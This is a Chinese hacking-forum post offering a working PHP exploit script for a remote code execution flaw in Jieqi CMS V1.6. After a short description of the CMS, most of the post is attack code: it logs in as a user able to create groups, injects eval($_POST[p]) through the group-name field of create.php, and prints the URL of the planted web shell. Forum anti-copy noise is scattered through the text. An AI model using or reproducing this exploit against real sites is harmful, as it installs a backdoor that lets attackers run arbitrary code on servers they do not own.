找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1973|回复: 0
打印 上一主题 下一主题

Jieqi(杰奇)CMS V1.6 PHP代码执行0day漏洞EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 11:28:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
% M) \+ I; D  Q- \2 z) P5 _6 t! _9 R5 K, D

# F+ A3 F6 S8 I6 r! |该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。" Z  N) H9 }6 A( E$ e9 y
需要有一个能创建圈子的用户。6 D6 Z* I( W* r$ e! T+ C

2 L3 q+ y4 C7 [1 c<?php
# j: r. X' u3 ^. ?7 }
5 r& B2 v) j) R$ W# hprint_r('5 P7 T' [8 ^; d
+---------------------------------------------------------------------------+0 |; t7 |$ Z( l
Jieqi CMS V1.6 PHP Code Injection Exploit
8 t* v' ]' c! Nby flyh4t
' G8 s; p3 L* {mail: phpsec at hotmail dot com3 m6 e( ?9 v* F2 h) ]) N5 E
team: http://www.wolvez.org
: p0 G. H( V) a) {; `+---------------------------------------------------------------------------+7 H: ?: y& Q: ]- `$ L& \# M3 _  i
'); /**
. I8 G1 Y1 L+ [6 ^$ V * works regardless of php.ini settings) h0 D) @9 V" d$ V  c
*/ if ($argc < 5) { print_r('
3 {- n4 x4 |  a/ m/ C" L' N+---------------------------------------------------------------------------+
9 i" o. N" W8 d, nUsage: php '.$argv[0].' host path username
9 r# i3 Z6 C, A+ N8 whost:      target server (ip/hostname)" K9 |: s  z  X8 Q) }; Z: f1 D
path:      path to jieqicms
% d- X" K1 v# o3 Nuasename:  a username who can create group0 A9 l# \5 b, ~5 B: M! P
Example:9 x" f$ P1 d1 u
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password1 E* J- s  _  p
+---------------------------------------------------------------------------+4 I4 u+ `# G% t; V; z
'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961* v, ^; b, w2 C# |
Content-Disposition: form-data; name="gname"/ [" @- `' `7 `" r6 h) n8 f
4 g0 W5 ]+ {" Z, F( E! ^. w
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t
  g7 Q# U. b/ c' o8 Z( k& J-----------------------------23281168279961
. [3 w& V& {& u8 rContent-Disposition: form-data; name="gcatid"
% Q* m$ m1 M- n
2 t( C4 g, h" ^$ z5 H; ^- B% g4 W1
; D0 w1 [! j  |. x+ z: K-----------------------------23281168279961" d9 J0 \% j5 ?" ]
Content-Disposition: form-data; name="gaudit"3 ^3 w6 f" A: ~" Q( D

: O$ ]6 w7 O: C, ?6 f4 U, E13 z$ U9 ]' V2 q) u: J* A; ?' k
-----------------------------23281168279961
$ T. N8 K7 w' U3 s0 B/ g/ a& \Content-Disposition: form-data; name="gbrief"
. n5 }3 C  r2 d2 E+ W# m, n
: q3 b( d: A8 n' _7 @4 \0 q9 x9 ^0 [1  V! g- U5 w& m. C4 L
-----------------------------23281168279961--
. w+ _1 ?2 ?! b) F& Q) q* i'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com
3 ]: I1 n9 |8 O! I6 x 7 u2 ~0 X  u& [6 `: D: O! ^
preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url;
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表